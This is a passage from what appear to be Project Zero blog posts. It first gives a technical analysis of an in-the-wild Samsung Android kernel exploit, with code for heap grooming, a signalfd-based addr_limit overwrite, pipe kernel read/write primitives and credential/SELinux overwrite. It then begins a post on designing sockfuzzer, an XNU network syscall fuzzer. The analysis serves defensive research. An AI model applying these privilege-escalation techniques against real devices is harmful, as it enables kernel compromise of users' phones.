 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};

#define KBASE_ioctl_MEM_PROFILE_ADD \

        _IOW(KBASE_ioctl_TYPE, 27, struct kbase_ioctl_mem_profile_add)

static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;

        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }

        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;

        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }

        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}

This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.

Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.

Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs.  The highlighted text reads: &quot;Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices&quot;

For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted.

a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y

a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0

Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.

#ifdef CONFIG_DEBUG_FS

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;

        mutex_lock(&kctx->mem_profile_lock);

        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }

        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }

        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        mutex_unlock(&kctx->mem_profile_lock);

        return err;

}

#else /* CONFIG_DEBUG_FS */

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */

By writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.

The exploit then calls dup2 on the dangling FD’s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.

To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  

Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.

signalfd(dangling_fd, 0xFFFFFF8000000000, 8);

According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).

int signalfd(int fd, const sigset_t *mask, int flags);

The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct..

typedef unsigned long sigset_t;

struct signalfd_ctx {

        sigset_t sigmask;

};

The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.

Let’s walk through how the signalfd source code updates the mask:

SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;

        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;

        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]

        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;

                ctx->sigmask = sigmask;

                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);

                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }

        return ufd;

}

First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).

The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer.

The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.

The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section.

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.

It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.

void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}

This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.

With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.

Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.

The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.

/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}

The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:

kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]            

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}

The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].

The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.

Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.

I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.

Screen shot of the &quot;OS Kernel&quot; section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says:  Functionality that: - is part of the kernel - runs in the same CPU context as the kernel (for example, device drivers) - has direct access to kernel memory (for example, hardware components on the device) - has the capability to load scripts into a kernel component (for example, eBPF) - is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).

As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.

The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.

Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.

The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.

This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.

Designing sockfuzzer, a network syscall fuzzer for XNU

By: Ryan
22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

